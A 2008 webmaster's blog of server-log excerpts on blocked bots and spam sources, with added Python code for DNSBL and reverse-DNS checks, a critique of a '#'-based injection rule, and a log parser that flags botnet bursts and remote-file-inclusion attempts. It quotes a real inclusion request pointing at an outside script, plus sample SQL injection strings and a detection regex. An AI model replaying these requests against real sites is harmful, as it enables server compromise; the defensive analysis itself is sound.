Jun 30, 2008

After banning the domain amazonaws.com because they are hosting bots, I get all of this.

Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com

Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com]
72.44.49.121 ec2-72-44-49-121.z-1.compute-1.amazonaws.com

Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.34.44 ec2-67-202-34-44.compute-1.amazonaws.com


Update: AideRSS just does not get it that they have been blocked.
67.202.23.122 ec2-67-202-23-122.compute-1.amazonaws.com
[06-17-2008-16:07:52] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.226.160 ec2-75-101-226-160.compute-1.amazonaws.com
[06-17-2008-16:09:04] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.219.174 ec2-75-101-219-174.compute-1.amazonaws.com
[06-17-2008-16:09:19] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.21.42 ec2-67-202-21-42.compute-1.amazonaws.com
[06-17-2008-16:09:22] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.23.83 ec2-67-202-23-83.compute-1.amazonaws.com
[06-17-2008-16:09:29] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.211.7 ec2-75-101-211-7.compute-1.amazonaws.com
[06-17-2008-16:09:35] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.244.65 ec2-75-101-244-65.compute-1.amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.61.94 ec2-67-202-61-94.compute-1.amazonaws.com


Update

67.202.31.132 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.61.94 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.83 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.21.42 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.122 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.34.44 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.57.15 is BLACKLISTED by dnsbl.njabl.org for spam


The following comment is associated with this record: This network is a member of a dynamic hosting environment. See http://ec2.amazonaws.com/
It was added to the list: Tue Apr 1 12:41:39 2008 EST

spam source means the system was found via manual spam header parsing to be the origin of spam.
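The domain ban at the top of this post and the DNSBL results above are two different lookups on the same data: the reverse (PTR) name of the connecting IP, and the IP itself reversed and queried under the list's zone. The following is an added example, not code from the post or from bad-behavior, showing both lookups offline. The IPs, reverse names and the "listed for spam" verdicts are the ones from this post; the 127.0.0.4 answer code, the forward A records and the 198.51.100.7 test address are assumptions made up for the demo. It also adds the check a practitioner would want before trusting a domain ban: the PTR name has to resolve forward to the same IP, because whoever controls the reverse zone can put any name there.

```python
import ipaddress
from typing import Callable, Iterable, List, Optional

NJABL_ZONE = "dnsbl.njabl.org"


def dnsbl_query_name(ip: str, zone: str = NJABL_ZONE) -> str:
    """DNSBL convention: reverse the four octets and append the list zone.
    67.202.31.132 -> 132.31.202.67.dnsbl.njabl.org"""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


def dnsbl_listed(ip: str, resolve_a: Callable[[str], Optional[str]],
                 zone: str = NJABL_ZONE) -> Optional[str]:
    """A listed address answers with a 127.0.0.x code; NXDOMAIN (None) means clean.
    A list that has been shut down (or whose domain changed hands) may answer for
    every name, so only a 127.0.0.0/8 answer counts as a listing."""
    answer = resolve_a(dnsbl_query_name(ip, zone))
    if answer is not None and not answer.startswith("127."):
        return None
    return answer


def in_banned_domain(hostname: str, banned: Iterable[str]) -> bool:
    """Match on whole DNS labels: 'amazonaws.com' covers
    ec2-67-202-31-132.compute-1.amazonaws.com but not notamazonaws.com."""
    host = hostname.lower().rstrip(".")
    for domain in banned:
        domain = domain.lower().rstrip(".")
        if host == domain or host.endswith("." + domain):
            return True
    return False


def forward_confirmed(ip: str, ptr_name: str,
                      resolve_a_all: Callable[[str], List[str]]) -> bool:
    """A PTR name is only trustworthy if it resolves back to the same IP."""
    return ip in resolve_a_all(ptr_name)


# Constructed resolver tables for the offline demo (assumptions, see above).
PTR = {"67.202.31.132": "ec2-67-202-31-132.compute-1.amazonaws.com",
       "74.6.8.122": "llf520018.crawl.yahoo.net",
       "198.51.100.7": "crawl.yahoo.net"}      # spoofed PTR on an RFC 5737 test address
FORWARD = {"ec2-67-202-31-132.compute-1.amazonaws.com": ["67.202.31.132"],
           "llf520018.crawl.yahoo.net": ["74.6.8.122"],
           "crawl.yahoo.net": ["74.6.8.122"]}
DNSBL = {dnsbl_query_name("67.202.31.132"): "127.0.0.4"}   # answer code is assumed


def verdict(ip: str, banned=("amazonaws.com",)) -> str:
    """Order matters: an unconfirmed reverse name is rejected before it can
    either trigger or dodge the domain ban."""
    name = PTR.get(ip, "")
    if name and not forward_confirmed(ip, name, lambda n: FORWARD.get(n, [])):
        return "reject: reverse name not forward-confirmed"
    if name and in_banned_domain(name, banned):
        return "reject: banned domain"
    if dnsbl_listed(ip, DNSBL.get):
        return "reject: DNSBL listed"
    return "allow"


if __name__ == "__main__":
    for ip in ("67.202.31.132", "74.6.8.122", "198.51.100.7", "203.0.113.9"):
        print(ip, PTR.get(ip, "(no PTR)"), "->", verdict(ip))
```

Swap the two dict lookups for real resolver calls (a PTR query, an A query for the PTR name, and an A query for the reversed-octet name under the zone) and the same functions work against a live list.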

Update July 15th
Agent: firefox/2.0.0.6 (ubuntu-feisty)
72.44.48.95 ec2-72-44-48-95.compute-1.amazonaws.com

Jun 17, 2008

openrbl.org is gone

openrbl.org is down and I need a replacement that can do a lookup on all of the block lists and do a DNS lookup.

I did find a replacement of sorts. Change the admin.php $dns_lookup setting to:

$dns_lookup ="http://www.robtex.com/rbl/";


If anyone knows of one please post it.

Jun 6, 2008

Request contained a malicious JavaScript or SQL injection attack

bad-behavior is now blocking what it says is a SQL injection, but all it's really looking for is a # in the header. So I end up seeing crap like this.

I think this may be a bug in bad behavior

Update: I am still seeing this from the Yahoo bot

403 Request contained a malicious JavaScript or SQL injection attack
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.8.122 llf520018.crawl.yahoo.net

403 Request contained a malicious JavaScript or SQL injection attack
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.17.186 llf520164.crawl.yahoo.net

403 Request contained a malicious JavaScript or SQL injection attack www.winnfreenet.com
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.22.159 llf520079.crawl.yahoo.net



    // Broken spambots send URLs with various invalid characters
    // Some broken browsers send the #vector in the referer field :(
    if (strpos($package['request_uri'], "#") !== FALSE) {
        return "dfd9b1ad";
    }
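To make clear what that check does and does not catch, here is an added example (not the post's code and not bad-behavior's): the same literal-'#' test, the test again after percent-decoding, and a separate, deliberately narrow injection pattern, run over a few constructed request URIs. The point is that the rule fires on any '#' regardless of SQL content, misses the same character sent as %23, and is independent of whether the request looks like an injection at all. The only SQL relevance '#' has is that MySQL treats it as an end-of-line comment marker.

```python
import re
from urllib.parse import unquote


def bad_behavior_hash_rule(request_uri: str) -> bool:
    """Exactly what the quoted bad-behavior code tests: a literal '#' anywhere in
    the request URI. Nothing about SQL is examined."""
    return "#" in request_uri


def hash_after_decoding(request_uri: str) -> bool:
    """The same test after one round of percent-decoding, so %23 counts as well."""
    return "#" in unquote(request_uri)


# A deliberately small set of injection shapes (UNION SELECT, quote-OR-equals,
# stacked DROP TABLE, trailing -- comment), only to show that the '#' rule and an
# actual injection check fire on different inputs. Not a complete detector.
SQLI_HINT = re.compile(
    r"(?i)(\bunion\b[\s/*]+select\b|'\s*or\s+\S+\s*=\s*\S+|;\s*drop\s+table\b|--\s*$)")


def looks_like_sqli(request_uri: str) -> bool:
    return bool(SQLI_HINT.search(unquote(request_uri)))


def classify(request_uri: str) -> dict:
    return {"literal_hash": bad_behavior_hash_rule(request_uri),
            "decoded_hash": hash_after_decoding(request_uri),
            "sqli_hint": looks_like_sqli(request_uri)}


# Constructed request URIs, not taken from the post's logs.
SAMPLES = [
    "/page.php?id=1#top",                        # harmless fragment that leaked into the request line
    "/page.php?id=1%23",                         # the same character, percent-encoded
    "/page.php?id=1%20UNION%20SELECT%201,2,3",   # injection with no '#' at all
    "/page.php?id=1'%20or%20'1'='1",             # another injection with no '#'
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(f"{uri:45} {classify(uri)}")
```

Only the first sample trips the '#' rule; the two injection-shaped requests sail through it, and the %23 variant is invisible to it unless the URI is decoded first.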

Jun 2, 2008

robot on pox1s.craigslist.org

Why would craigslist.org be running a bot?

403 Required header 'Accept' missing
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
66.150.243.17 pox1s.craigslist.org

Jun 1, 2008

barton.centeralnet.com bot

Agent: -NO AGENT-
216.32.80.66 barton.centeralnet.com

Some type of web hosting company in Iran

developmentseed.org Bot 207.162.216.100 www1.developmentseed.org

Agent: python-urllib/2.4
207.162.216.100 www1.developmentseed.org

Why is developmentseed.org scanning my site using a free bot library?

I don't see anything on the site about them running a bot.

hacker using email brancohat@gmail.com and script at www.1004smile.com/data/enviador.txt

Another hacker trying to inject a PHP script located at:
http://www.1004smile.com/data/enviador.txt

[05-31-2008-15:49:12]
advanced_search_result.php?categories_id=http://www.1004smile.com/data/enviador.txt?&servidor=www._____.com/advanced_search_result.php?categories_id=&para=brancohat@gmail.com GET HTTP/1.1
Agent: -NO AGENT-
81.171.34.37 kopkaas.com

This has something to do with the osCommerce search routine.

Lame Botnets

When you see the same lame bug in a bot coming from several IPs at the same time, it must be a botnet. If you own any of these, please remove the bots from your system.


[05-31-2008-12:24:55] bad-behavior 417 Header 'Expect' prohibited; resend without Expect /submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
210.138.109.72 72.109.138.210.bn.2iij.net

[05-31-2008-12:25:03] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
194.120.231.244 khe-fwcluster-ext.khe.agile.agilesoft.com

[05-31-2008-12:25:08] bad-behavior 403 Required header 'Accept' missing
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)
216.106.84.150 mx3.ntm.org

[05-31-2008-12:25:10] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
194.120.231.244 khe-fwcluster-ext.khe.agile.agilesoft.com

[05-31-2008-12:25:17] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
129.142.64.65 chef.catpipe.net

[05-31-2008-12:25:23] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
213.134.40.89 baphealth.c.mad.interhost.com


[05-31-2008-12:26:35] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
194.120.231.244 khe-fwcluster-ext.khe.agile.agilesoft.com

[05-31-2008-12:26:47] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
62.3.32.27

[05-31-2008-12:26:54] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
62.3.32.27

[05-31-2008-12:27:20] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
163.24.235.249
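Two of the entries above are easy to spot by hand and tedious to spot at scale: the remote-file-inclusion attempt against advanced_search_result.php (a query parameter whose value is a full http:// URL) and the "lame botnet" pattern (many distinct IPs tripping the same bad-behavior rule within a couple of minutes). The following is an added example, not code from the post or from bad-behavior, that parses the three-line log layout used in this post and runs both checks over it. The sample log is a constructed subset of the entries quoted above, with the "&para" parameter restored from the mis-rendered pilcrow; the window of 180 seconds and the threshold of four distinct IPs are assumptions chosen to fit the sample.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import parse_qsl

# Constructed sample: a subset of the entries quoted in the post, same layout.
# The "www._____.com" host is left exactly as the post shows it.
SAMPLE_LOG = """\
[05-31-2008-12:24:55] bad-behavior 417 Header 'Expect' prohibited; resend without Expect /submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
210.138.109.72 72.109.138.210.bn.2iij.net
[05-31-2008-12:25:08] bad-behavior 403 Required header 'Accept' missing
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)
216.106.84.150 mx3.ntm.org
[05-31-2008-12:25:17] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
129.142.64.65 chef.catpipe.net
[05-31-2008-12:25:23] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
213.134.40.89 baphealth.c.mad.interhost.com
[05-31-2008-12:27:20] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
163.24.235.249
[05-31-2008-15:49:12]
advanced_search_result.php?categories_id=http://www.1004smile.com/data/enviador.txt?&servidor=www._____.com/advanced_search_result.php?categories_id=&para=brancohat@gmail.com GET HTTP/1.1
Agent: -NO AGENT-
81.171.34.37 kopkaas.com
"""

TS_RE = re.compile(r"^\[(\d{2}-\d{2}-\d{4}-\d{2}:\d{2}:\d{2})\]\s*(.*)$")
IP_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})(?:\s+(\S+))?$")
REQ_RE = re.compile(r"^(\S+)\s+(GET|POST|HEAD)\s+HTTP/\d\.\d$")
SIG_RE = re.compile(r"^bad-behavior (\d{3} .+?)(?:\s+/?[\w./-]+\.php)?$")


@dataclass
class Entry:
    when: datetime
    message: str = ""
    request: str = ""
    agent: str = ""
    ip: str = ""
    host: str = ""


def parse_log(text: str) -> list:
    """A [timestamp] line opens an entry; the Agent, IP/hostname and request
    lines that follow belong to it."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        ts = TS_RE.match(line)
        if ts:
            entries.append(Entry(datetime.strptime(ts.group(1), "%m-%d-%Y-%H:%M:%S"), ts.group(2)))
            continue
        if not line or not entries:
            continue
        cur, ip = entries[-1], IP_RE.match(line)
        if line.startswith("Agent:"):
            cur.agent = line[len("Agent:"):].strip()
        elif ip:
            cur.ip, cur.host = ip.group(1), ip.group(2) or ""
        elif REQ_RE.match(line):
            cur.request = line
    return entries


def signature(message: str) -> str:
    """Reduce a bad-behavior rejection to status + reason, dropping the path."""
    m = SIG_RE.match(message)
    return m.group(1) if m else message


def detect_bursts(entries, window_seconds=180, min_ips=4) -> dict:
    """Per rejection signature, the largest set of distinct source IPs seen in
    any window_seconds span; only sets of min_ips or more are returned. One IP
    hammering a site is a broken client; many IPs tripping the same rule within
    seconds is the botnet pattern described in the post."""
    by_sig = defaultdict(list)
    for e in entries:
        if e.ip and e.message.startswith("bad-behavior"):
            by_sig[signature(e.message)].append((e.when, e.ip))
    span, bursts = timedelta(seconds=window_seconds), {}
    for sig, events in by_sig.items():
        events.sort()
        best = set()
        for i, (start, _) in enumerate(events):
            ips = {ip for t, ip in events[i:] if t - start <= span}
            if len(ips) > len(best):
                best = ips
        if len(best) >= min_ips:
            bursts[sig] = best
    return bursts


def remote_includes(request_line: str) -> list:
    """(param, value) pairs whose value is an absolute http(s) URL: the shape of
    a remote-file-inclusion attempt. The trailing '?' on the injected URL is
    deliberate: whatever the script appends becomes a query string for the
    remote file, so the include still fetches it."""
    m = REQ_RE.match(request_line)
    target = m.group(1) if m else request_line
    query = target.split("?", 1)[1] if "?" in target else ""
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if re.match(r"https?://", v, re.I)]


if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG)
    for sig, ips in detect_bursts(log).items():
        print(f"burst: {sig} from {len(ips)} IPs: {sorted(ips)}")
    for e in log:
        for param, url in remote_includes(e.request):
            print(f"RFI attempt from {e.ip} ({e.agent}): {param}={url}")
```

On the sample, the 417 "Expect" signature is reported from four IPs inside the 180-second window while the single 403 is not, and the only remote include found is categories_id pointing at enviador.txt. Tightening the window to 60 seconds drops the burst below the threshold, which is the knob to turn when a site's normal crawler traffic starts showing up as a "botnet".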